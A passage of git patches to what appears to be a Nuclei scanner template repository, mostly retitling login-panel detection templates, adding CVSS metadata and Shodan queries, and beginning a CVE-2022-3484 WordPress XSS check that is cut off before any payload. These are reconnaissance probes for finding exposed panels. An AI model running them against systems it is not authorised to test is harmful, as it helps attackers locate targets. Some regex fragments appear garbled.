tech,telerik,asp requests: - method: GET diff --git a/technologies/thinkcmf-detect.yaml b/technologies/thinkcmf-detect.yaml index c4136da57d..b67c4077c4 100644 --- a/technologies/thinkcmf-detect.yaml +++ b/technologies/thinkcmf-detect.yaml @@ -4,7 +4,7 @@ info: name: Detect ThinkCMF author: pikpikcu,daffainfo severity: info - tags: panel,thinkcmf,login + tags: panel,thinkcmf,login,tech requests: - method: GET diff --git a/technologies/vmware/vmware-site-recovery-manager.yaml b/technologies/vmware/vmware-site-recovery-manager.yaml index 215829f014..dd1f21e2b2 100644 --- a/technologies/vmware/vmware-site-recovery-manager.yaml +++ b/technologies/vmware/vmware-site-recovery-manager.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: shodan-query: http.title:"Welcome to VMware Site Recovery Manager" - tags: panel,vmware + tags: panel,vmware,tech requests: - method: GET diff --git a/technologies/vmware/vmware-vrealize-detect.yaml b/technologies/vmware/vmware-vrealize-detect.yaml index 1abab92afb..f74400cc57 100644 --- a/technologies/vmware/vmware-vrealize-detect.yaml +++ b/technologies/vmware/vmware-vrealize-detect.yaml @@ -5,7 +5,7 @@ info: author: milo2012 severity: info description: Version of VMware vRealize Operations Manager - tags: vmware,vrealize + tags: vmware,vrealize,tech requests: - method: GET diff --git a/technologies/yeswiki-detect.yaml b/technologies/yeswiki-detect.yaml index 95515a4696..04a8a1c8cf 100644 --- a/technologies/yeswiki-detect.yaml +++ b/technologies/yeswiki-detect.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: http.html:"yeswiki" - tags: yeswiki,panel + tags: yeswiki,panel,tech requests: - method: GET From afbdb0cdb88e7663fd674a47b9b1315534460fbf Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 15 Nov 2022 01:20:18 +0530 Subject: [PATCH 0300/1415] MS .NET Remoting Detect --- .../dotnet-remoting-service-detect.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 network/detection/dotnet-remoting-service-detect.yaml diff --git a/network/detection/dotnet-remoting-service-detect.yaml b/network/detection/dotnet-remoting-service-detect.yaml new file mode 100644 index 0000000000..8a0237173b --- /dev/null +++ b/network/detection/dotnet-remoting-service-detect.yaml @@ -0,0 +1,29 @@ +id: dotnet-remoting-service-detect + +info: + name: MS .NET Remoting httpd Detection + author: pussycat0x + severity: info + description: | + The . NET remoting framework provides an approach to interprocess communication that abstracts the remotable object from a specific client or server application domain and from a specific mechanism of communication. + metadata: + verified: true + shodan-query: product:"MS .NET Remoting httpd" + tags: network,detect,microsoft + +network: + + - inputs: + - data: "\n" + host: + - "{{Hostname}}" + - "{{Host}}:8080" + matchers-condition: and + matchers: + - type: word + words: + - "Server: MS .NET Remoting" + extractors: + - type: regex + regex: + - ".NET CLR ([0-9.]+)" From f104fa03520d05843b5d5e4ffc9a3bb3fc5662e0 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 15 Nov 2022 01:22:40 +0530 Subject: [PATCH 0301/1415] Update dotnet-remoting-service-detect.yaml --- network/detection/dotnet-remoting-service-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/network/detection/dotnet-remoting-service-detect.yaml b/network/detection/dotnet-remoting-service-detect.yaml index 8a0237173b..341f0612de 100644 --- a/network/detection/dotnet-remoting-service-detect.yaml +++ b/network/detection/dotnet-remoting-service-detect.yaml @@ -26,4 +26,4 @@ network: extractors: - type: regex regex: - - ".NET CLR ([0-9.]+)" + - ".NET CLR ([0-9.]+)" From cbd0024812465adff5847a5204d60309760f555b Mon Sep 17 00:00:00 2001 From: Ricardo Maia Date: Tue, 15 Nov 2022 00:23:46 -0300 Subject: [PATCH 0302/1415] Update wordpress-detect.yaml --- technologies/wordpress-detect.yaml | 55 ++++++++++++++++-------------- 1 file changed, 30 insertions(+), 25 deletions(-) diff --git a/technologies/wordpress-detect.yaml b/technologies/wordpress-detect.yaml index ef69cb594a..08f4229649 100644 --- a/technologies/wordpress-detect.yaml +++ b/technologies/wordpress-detect.yaml @@ -2,7 +2,7 @@ id: wordpress-detect info: name: WordPress Detect - author: pdteam,daffainfo + author: pdteam,daffainfo,ricardomaia severity: info metadata: verified: true @@ -11,40 +11,45 @@ info: requests: - method: GET - path: - - '{{BaseURL}}' - - '{{BaseURL}}/feed/' - - '{{BaseURL}}/?feed=rss2' #alternative if /feed/ is blocked - stop-at-first-match: true - matchers-condition: or + path: + - "{{BaseURL}}/feed/" + - "{{BaseURL}}/wp-admin/install.php" + - "{{BaseURL}}" + - "{{BaseURL}}/?feed=rss2" # alternative if /feed/ is blocked + + matchers-condition: and matchers: - type: regex regex: + - 'https?:\/\/wordpress\.org.*' + - "wp-login.php" + - '\/wp-content/themes\/' + - '\/wp-includes\/' + - 'name="generator" content="wordpress' - ']+s\d+\.wp\.com' - '" part: body + +# Enhanced by md on 2022/11/10 diff --git a/exposed-panels/concourse-ci-panel.yaml b/exposed-panels/concourse-ci-panel.yaml index 273493c803..1bdb809bca 100644 --- a/exposed-panels/concourse-ci-panel.yaml +++ b/exposed-panels/concourse-ci-panel.yaml @@ -1,12 +1,17 @@ id: concourse-ci-panel info: - name: Concourse CI Panel Detect + name: Concourse CI Login Panel - Detect author: praetorian-thendrickson severity: info + description: Concourse CI login panel was detected. reference: - https://github.com/concourse/concourse - https://concourse-ci.org + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: title:"Concourse" tags: panel,concourse,oss @@ -22,3 +27,5 @@ requests: - 'Concourse' - 'login to Concourse' condition: or + +# Enhanced by md on 2022/11/10 diff --git a/exposed-panels/concrete5/concrete5-panel.yaml b/exposed-panels/concrete5/concrete5-panel.yaml index e0fc5e2bb1..62f6e25798 100644 --- a/exposed-panels/concrete5/concrete5-panel.yaml +++ b/exposed-panels/concrete5/concrete5-panel.yaml @@ -1,9 +1,14 @@ id: concrete5-panel info: - name: Concrete5 Panel + name: Concrete5 Login Panel - Detect author: dhiyaneshDk severity: info + description: Concrete5 login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"concrete5" tags: panel,concrete5,cms @@ -30,3 +35,5 @@ requests: regex: - 'content="concrete5 \- ([0-9.]+)"\/>' - 'Version ([0-9.]+)' + +# Enhanced by md on 2022/11/10 diff --git a/exposed-panels/connectwise-backup-manager.yaml b/exposed-panels/connectwise-backup-manager.yaml index bc2105926a..ed4c1ff7e5 100644 --- a/exposed-panels/connectwise-backup-manager.yaml +++ b/exposed-panels/connectwise-backup-manager.yaml @@ -1,11 +1,16 @@ id: connectwise-backup-manager info: - name: ConnectWise Server Backup Manager SE Panel + name: ConnectWise Server Backup Manager SE Panel - Detect author: prajiteshsingh severity: info + description: ConnectWise Server Backup Manager SE login panel was detected. reference: - https://www.connectwise.com/company/trust/security-bulletins/r1soft-and-recover-security-bulletin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.component:zk http.title:"Server Backup Manager" @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/10 diff --git a/exposed-panels/contao-login-panel.yaml b/exposed-panels/contao-login-panel.yaml index e1112d80a4..f028e457d2 100644 --- a/exposed-panels/contao-login-panel.yaml +++ b/exposed-panels/contao-login-panel.yaml @@ -1,9 +1,14 @@ id: contao-login-panel info: - name: Contao Login Panel + name: Contao Login Panel - Detect author: princechaddha severity: info + description: Contao login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.html:"Contao Open Source CMS" @@ -27,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/10 diff --git a/exposed-panels/defectdojo-panel.yaml b/exposed-panels/defectdojo-panel.yaml index bd6745c3c9..53ad351268 100644 --- a/exposed-panels/defectdojo-panel.yaml +++ b/exposed-panels/defectdojo-panel.yaml @@ -1,9 +1,14 @@ id: defectdojo-panel info: - name: DefectDojo Exposure + name: DefectDojo Login Panel - Detect author: Adam Crosser severity: info + description: DefectDojo login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: html:"DefectDojo Logo" tags: panel,defectdojo @@ -17,3 +22,5 @@ requests: - type: word words: - "\"DefectDojoLog In' - 'device/logOff_up_menu1.htm' condition: and + +# Enhanced by md on 2022/11/10 diff --git a/exposed-panels/dell-wyse-login.yaml b/exposed-panels/dell-wyse-login.yaml index 88dfef6f03..41c03d8609 100644 --- a/exposed-panels/dell-wyse-login.yaml +++ b/exposed-panels/dell-wyse-login.yaml @@ -1,11 +1,16 @@ id: dell-wyse-login info: - name: Dell Wyse Management Suite Login Panel + name: Dell Wyse Management Suite Login Panel - Detect author: gy741 severity: info + description: Dell Wyse Management Suite login panel was detected. reference: - https://research.nccgroup.com/2021/07/06/technical-advisory-arbitrary-file-read-in-dell-wyse-management-suite-cve-2021-21586-cve-2021-21587/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,dell,login requests: @@ -22,3 +27,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/10 diff --git a/exposed-panels/delta-login-panel.yaml b/exposed-panels/delta-login-panel.yaml index 39385fb125..152d385b19 100644 --- a/exposed-panels/delta-login-panel.yaml +++ b/exposed-panels/delta-login-panel.yaml @@ -1,9 +1,14 @@ id: delta-login-panel info: - name: Delta Controls Admin Login Panel + name: Delta Controls Admin Login Panel - Detect author: gy741 severity: info + description: Delta Controls admin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.html:"Delta Controls ORCAview" tags: panel,delta @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/10 diff --git a/exposed-panels/deluge-webui-panel.yaml b/exposed-panels/deluge-webui-panel.yaml index da939cbead..f08e3c7cec 100644 --- a/exposed-panels/deluge-webui-panel.yaml +++ b/exposed-panels/deluge-webui-panel.yaml @@ -1,9 +1,14 @@ id: deluge-webui-panel info: - name: Deluge WebUI Panel Exposed + name: Deluge WebUI Login Panel - Detect author: tess severity: info + description: Deluge WebUI login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-dork: title:"Deluge WebUI" @@ -31,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/11 diff --git a/exposed-panels/dericam-login.yaml b/exposed-panels/dericam-login.yaml index 42e8a962e0..975cad8642 100644 --- a/exposed-panels/dericam-login.yaml +++ b/exposed-panels/dericam-login.yaml @@ -1,9 +1,14 @@ id: dericam-login info: - name: Dericam Login + name: Dericam Login Panel - Detect author: dhiyaneshDk severity: info + description: Dericam login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 reference: - https://www.exploit-db.com/ghdb/7354 metadata: @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/11 diff --git a/exposed-panels/digitalrebar-login.yaml b/exposed-panels/digitalrebar-login.yaml index d7142d9361..bbf59c06c3 100644 --- a/exposed-panels/digitalrebar-login.yaml +++ b/exposed-panels/digitalrebar-login.yaml @@ -1,13 +1,17 @@ id: digitalrebar-login info: - name: RackN Digital Rebar Login Panel + name: RackN Digital Rebar Login Panel - Detect author: c-sh0 severity: info - description: RackN Digital Rebar provision UI detection + description: RackN Digital Rebar login panel was detected. reference: - https://docs.rackn.io/ - https://docs.rackn.io/en/latest/doc/server.html#ports + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: rackn,digitalrebar,panel requests: @@ -29,3 +33,5 @@ requests: part: body words: - 'Digital Rebar' + +# Enhanced by md on 2022/11/11 diff --git a/exposed-panels/directadmin-login-panel.yaml b/exposed-panels/directadmin-login-panel.yaml index 054bcf4eb0..8194601912 100644 --- a/exposed-panels/directadmin-login-panel.yaml +++ b/exposed-panels/directadmin-login-panel.yaml @@ -1,12 +1,16 @@ id: directadmin-login-panel info: - name: DirectAdmin Login Panel Detect + name: DirectAdmin Login Panel - Detect author: idealphase severity: info - description: A modern control panel's primary purpose is to effectively facilitate the routine management of your hosting infrastructure and present these tasks simply and intuitively to both the user and to you as the administrator. + description: DirectAdmin login panel was detected. reference: - https://www.directadmin.com/whats_new.php + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: title:"DirectAdmin Login" tags: panel,directadmin @@ -25,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/11 diff --git a/exposed-panels/directum-login.yaml b/exposed-panels/directum-login.yaml index 350af25e2f..1ae5437259 100644 --- a/exposed-panels/directum-login.yaml +++ b/exposed-panels/directum-login.yaml @@ -1,9 +1,14 @@ id: directum-login info: - name: Directum Login Panel + name: Directum Login Panel - Detect author: pikpikcu severity: info + description: Directum login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: fofa-query: title="Directum" tags: directum,panel @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/11 diff --git a/exposed-panels/django-admin-panel.yaml b/exposed-panels/django-admin-panel.yaml index 5e939f8a82..aeda0b3546 100644 --- a/exposed-panels/django-admin-panel.yaml +++ b/exposed-panels/django-admin-panel.yaml @@ -1,9 +1,14 @@ id: django-admin-panel info: - name: Python Django Admin Panel + name: Python Django Admin Login Panel - Detect author: pdteam severity: info + description: Python Django admin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,django,python requests: @@ -16,3 +21,5 @@ requests: - "Django administration" condition: and part: body + +# Enhanced by md on 2022/11/11 diff --git a/exposed-panels/docebo-elearning-panel.yaml b/exposed-panels/docebo-elearning-panel.yaml index 1e0c7a6814..c96ea72857 100644 --- a/exposed-panels/docebo-elearning-panel.yaml +++ b/exposed-panels/docebo-elearning-panel.yaml @@ -1,9 +1,14 @@ id: docebo-elearning-panel info: - name: Docebo E-learning Login Panel + name: Docebo eLearning Login Panel - Detect author: pikpikcu severity: info + description: Docebo eLearning login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true fofa-query: title="Docebo E-learning" @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/11 diff --git a/exposed-panels/dolibarr-panel.yaml b/exposed-panels/dolibarr-panel.yaml index 1d502057cf..d13ee61501 100644 --- a/exposed-panels/dolibarr-panel.yaml +++ b/exposed-panels/dolibarr-panel.yaml @@ -1,9 +1,14 @@ id: dolibarr-panel info: - name: Dolibarr Panel Login + name: Dolibarr Login Panel - Detect author: pikpikcu,daffainfo severity: info + description: Dolibarr login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Dolibarr" tags: panel,dolibarr @@ -37,3 +42,5 @@ requests: - 'Dolibarr ([0-9.]+)<\/td>' - 'Dolibarr ([0-9.]+)<\/td>' - '
Dolibarr ([0-9.]+)<\/div>' + +# Enhanced by md on 2022/11/11 diff --git a/exposed-panels/dotclear-panel.yaml b/exposed-panels/dotclear-panel.yaml index 8d9076985c..9247e24df2 100644 --- a/exposed-panels/dotclear-panel.yaml +++ b/exposed-panels/dotclear-panel.yaml @@ -1,9 +1,14 @@ id: dotclear-panel info: - name: Dotclear Panel Login + name: Dotclear Admin Login Panel - Detect author: pikpikcu,daffainfo severity: info + description: Dotclear admin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Dotclear" tags: panel,dotclear @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/11 diff --git a/exposed-panels/dotcms-admin-panel.yaml b/exposed-panels/dotcms-admin-panel.yaml index 4573c1472c..7f8e44a4eb 100644 --- a/exposed-panels/dotcms-admin-panel.yaml +++ b/exposed-panels/dotcms-admin-panel.yaml @@ -1,9 +1,14 @@ id: dotcms-admin-panel info: - name: dotAdmin Panel + name: dotAdmin Login Panel- Detect author: impramodsargar severity: info + description: dotAdmin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,dotcms,cms requests: @@ -16,3 +21,5 @@ requests: - type: word words: - 'dotCMS Content Management Platform' + +# Enhanced by md on 2022/11/11 diff --git a/exposed-panels/drawio-flowchartmaker-panel.yaml b/exposed-panels/drawio-flowchartmaker-panel.yaml index ca869a7189..8bf09c9e70 100644 --- a/exposed-panels/drawio-flowchartmaker-panel.yaml +++ b/exposed-panels/drawio-flowchartmaker-panel.yaml @@ -1,11 +1,16 @@ id: drawio-flowchartmaker-panel info: - name: Draw.io Flowchart Maker Panel + name: draw.io Flowchart Maker Panel - Detect author: princechaddha severity: info + description: draw.io Flowchart Maker panel was detected. reference: - https://github.com/jgraph/drawio + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"Flowchart Maker" @@ -22,8 +27,10 @@ requests: - type: word part: body words: - - "Flowchart Maker & Online Diagram Software" + - "Flowchart Maker & Online Diagram Software" - type: status status: - 200 + +# Enhanced by md on 2022/11/11 diff --git a/exposed-panels/drone-ci-panel.yaml b/exposed-panels/drone-ci-panel.yaml index 2d15db9eb6..ae665a245c 100644 --- a/exposed-panels/drone-ci-panel.yaml +++ b/exposed-panels/drone-ci-panel.yaml @@ -1,11 +1,16 @@ id: drone-ci-panel info: - name: Drone CI Panel Detect + name: Drone CI Login Panel - Detect author: Yuzhe-zhang-0 severity: info + description: Drone CI login panel was detected. reference: - https://www.drone.io + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.favicon.hash:1354079303 tags: panel,droneci,cicd @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/11 diff --git a/exposed-panels/druid-console-exposure.yaml b/exposed-panels/druid-console-exposure.yaml index 7e84cf9204..07413bf87e 100644 --- a/exposed-panels/druid-console-exposure.yaml +++ b/exposed-panels/druid-console-exposure.yaml @@ -1,9 +1,14 @@ id: druid-console-exposure info: - name: Alibaba Druid Console Exposure + name: Alibaba Druid Panel - Detect author: pdteam severity: medium + description: Alibaba Druid panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,alibaba,druid requests: @@ -17,3 +22,5 @@ requests: - 'src="/druid.js"' - 'href="/druid.css"' condition: and + +# Enhanced by md on 2022/11/11 diff --git a/exposed-panels/druid-panel.yaml b/exposed-panels/druid-panel.yaml index 5ac2fd1a81..c757ac7567 100644 --- a/exposed-panels/druid-panel.yaml +++ b/exposed-panels/druid-panel.yaml @@ -1,9 +1,14 @@ id: druid-panel info: - name: Druid monitor Panel Login + name: Druid Monitor Login Panel - Detect author: pikpikcu,daffainfo severity: info + description: Druid Monitor login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,druid requests: @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/11 diff --git a/exposed-panels/drupal-login.yaml b/exposed-panels/drupal-login.yaml index a55e1520c9..8535d2b572 100644 --- a/exposed-panels/drupal-login.yaml +++ b/exposed-panels/drupal-login.yaml @@ -1,9 +1,14 @@ id: drupal-login info: - name: Drupal login + name: Drupal Login Panel - Detect author: pathtaga severity: info + description: Drupal login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.component:"drupal" tags: panel,drupal @@ -30,3 +35,5 @@ requests: - '(?i)x-drupal' - "(?i)x-generator: drupal" condition: or + +# Enhanced by md on 2022/11/11 diff --git a/exposed-panels/dynamicweb-panel.yaml b/exposed-panels/dynamicweb-panel.yaml index 75dd3498c7..82696d6926 100644 --- a/exposed-panels/dynamicweb-panel.yaml +++ b/exposed-panels/dynamicweb-panel.yaml @@ -1,11 +1,16 @@ id: dynamicweb-panel info: - name: Dynamicweb Login Panel + name: Dynamicweb Login Panel - Detect author: pdteam severity: info + description: Dynamicweb login panel was detected. reference: - https://www.dynamicweb.com + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.component:"Dynamicweb" tags: panel,dynamicweb @@ -33,4 +38,6 @@ requests: part: body group: 1 regex: - - version ([0-9.]+) \ No newline at end of file + - version ([0-9.]+) + +# Enhanced by md on 2022/11/11 diff --git a/exposed-panels/dzzoffice/dzzoffice-panel.yaml b/exposed-panels/dzzoffice/dzzoffice-panel.yaml index d639701cbd..daf211c1d4 100644 --- a/exposed-panels/dzzoffice/dzzoffice-panel.yaml +++ b/exposed-panels/dzzoffice/dzzoffice-panel.yaml @@ -1,9 +1,14 @@ id: dzzoffice-panel info: - name: DzzOffice Panel Detect + name: DzzOffice Login Panel - Detect author: ritikchaddha severity: info + description: DzzOffice login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.favicon.hash:-1961736892 @@ -32,3 +37,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/11 diff --git a/exposed-panels/eMerge-panel.yaml b/exposed-panels/eMerge-panel.yaml index 1303b78121..a92aa84b67 100644 --- a/exposed-panels/eMerge-panel.yaml +++ b/exposed-panels/eMerge-panel.yaml @@ -1,9 +1,14 @@ id: eMerge-panel info: - name: Nortek Linear eMerge - Panel Detect + name: Nortek Linear eMerge Panel - Detect author: arafatansari severity: info + description: Nortek Linear eMerge panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"eMerge" @@ -26,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/11 diff --git a/exposed-panels/ecosys-command-center.yaml b/exposed-panels/ecosys-command-center.yaml index 4d3c17ee96..7e09a0dda1 100644 --- a/exposed-panels/ecosys-command-center.yaml +++ b/exposed-panels/ecosys-command-center.yaml @@ -1,9 +1,14 @@ id: ecosys-command-center info: - name: ECOSYS Command Center RX Detect + name: ECOSYS Command Center RX Panel - Detect author: princechaddha severity: info + description: ECOSYS Command Center RX panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,printer,ecosys,iot requests: @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/11 diff --git a/exposed-panels/eko-management-console-login.yaml b/exposed-panels/eko-management-console-login.yaml index 2f29a4225e..d09344efb4 100644 --- a/exposed-panels/eko-management-console-login.yaml +++ b/exposed-panels/eko-management-console-login.yaml @@ -1,13 +1,15 @@ id: eko-management-console-login info: - name: Eko Charger Management Console + name: Eko Charger Management Console Login Panel - Detect author: clem9669 severity: info - description: A console login is prompted for accessing Charger Management Console. + description: Eko Charger Management Console login panel was detected. reference: - https://ekoenergetyka.com.pl/software-solutions/ classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 cwe-id: CWE-200 metadata: verified: true @@ -30,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/14 diff --git a/exposed-panels/eko-software-update-panel.yaml b/exposed-panels/eko-software-update-panel.yaml index 767cb9c88d..8af9b7b674 100644 --- a/exposed-panels/eko-software-update-panel.yaml +++ b/exposed-panels/eko-software-update-panel.yaml @@ -1,13 +1,15 @@ id: eko-software-update-panel info: - name: Eko Software Update for Embedded Systems + name: Eko Software Update Panel - Detect author: clem9669 severity: info - description: Software update for embedded systems. It is possible to upload an software image or restart the system. + description: Eko software update panel for embedded systems was detected. An attacker can possibly upload a software image or restart the system. reference: - https://ekoenergetyka.com.pl/software-solutions/ classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 cwe-id: CWE-200 metadata: shodan-query: http.title:"Ekoenergetyka-Polska Sp. z o.o - CCU3 Software Update for Embedded Systems" @@ -29,3 +31,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/14 diff --git a/exposed-panels/emby-panel.yaml b/exposed-panels/emby-panel.yaml index fbbc036d3e..9105b4a585 100644 --- a/exposed-panels/emby-panel.yaml +++ b/exposed-panels/emby-panel.yaml @@ -1,14 +1,18 @@ id: emby-panel info: - name: Emby Login Panel + name: Emby Login Panel - Detect author: idealphase severity: info description: | - Emby Server is a personal media server with apps on just about every device. + Emby login panel was detected. reference: - https://github.com/MediaBrowser/Emby - https://emby.media/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"emby" @@ -38,3 +42,5 @@ requests: group: 1 regex: - '&srt=yes" + - "My Download" + condition: and - type: word part: header words: - - "text/html" + - text/html - - type: word - part: body - words: - - "" \ No newline at end of file + - type: status + status: + - 200 From 5b7d0ed3d26e17a359489e20e2f0507b4c9768b1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 15 Nov 2022 16:45:39 +0000 Subject: [PATCH 0319/1415] Auto Generated CVE annotations [Tue Nov 15 16:45:39 UTC 2022] :robot: --- exposed-panels/claris-filemaker-webdirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/claris-filemaker-webdirect.yaml b/exposed-panels/claris-filemaker-webdirect.yaml index 3ad9fd98ff..db604df6e1 100644 --- a/exposed-panels/claris-filemaker-webdirect.yaml +++ b/exposed-panels/claris-filemaker-webdirect.yaml @@ -14,7 +14,7 @@ info: metadata: verified: true shodan-dork: title:"Claris FileMaker WebDirect" - tags: panel + tags: panel,edb requests: - method: GET From cda2fd43575ad6c3983f1a9e70668e4b82764a8e Mon Sep 17 00:00:00 2001 From: Aman Rawat Date: Tue, 15 Nov 2022 22:28:27 +0530 Subject: [PATCH 0320/1415] Added template for CVE-2022-3484 --- cves/2022/CVE-2022-3484.yaml | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 cves/2022/CVE-2022-3484.yaml diff --git a/cves/2022/CVE-2022-3484.yaml b/cves/2022/CVE-2022-3484.yaml new file mode 100644 index 0000000000..ca5322d830 --- /dev/null +++ b/cves/2022/CVE-2022-3484.yaml @@ -0,0 +1,34 @@ +id: CVE-2022-3484 + +info: + name: WPB Show Core - Reflected Cross-Site Scripting + author: theamanrawat + severity: medium + description: | + The WPB Show Core WordPress plugin through TODO does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting. + reference: + - https://wpscan.com/vulnerability/3afaed61-6187-4915-acf0-16e79d5c2464 + - https://nvd.nist.gov/vuln/detail/CVE-2022-3484 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-3484 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2022,xss,wp,wordpress,wp-plugin,wpscan + +requests: + - method: GET + path: + - 